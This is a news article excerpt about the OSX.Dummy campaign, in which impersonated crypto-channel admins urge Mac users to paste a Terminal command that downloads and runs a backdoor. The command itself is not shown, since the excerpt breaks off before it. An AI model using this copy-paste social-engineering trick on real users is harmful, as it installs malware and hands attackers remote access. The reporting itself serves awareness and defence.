Enlarge (credit: Lucasfilm)

Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs. The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker.
Patrick Wardle, a Mac malware expert, also examined the malware and dubbed it "OSX.Dummy" because, as he wrote:

  • the infection method is dumb
  • the massive size of the binary is dumb
  • the persistence mechanism is lame (and thus also dumb)
  • the capabilities are rather limited (and thus rather dumb)
  • it's trivial to detect at every step (that dumb)
  • ... and finally, the malware saves the user's password to dumpdummy
The attack, first noted by Remco Verhoef of SANS today, downloads its awkward payload from a remote server, makes that file executable, and runs it. It looks something like this:

Read 3 remaining paragraphs | Comments


More...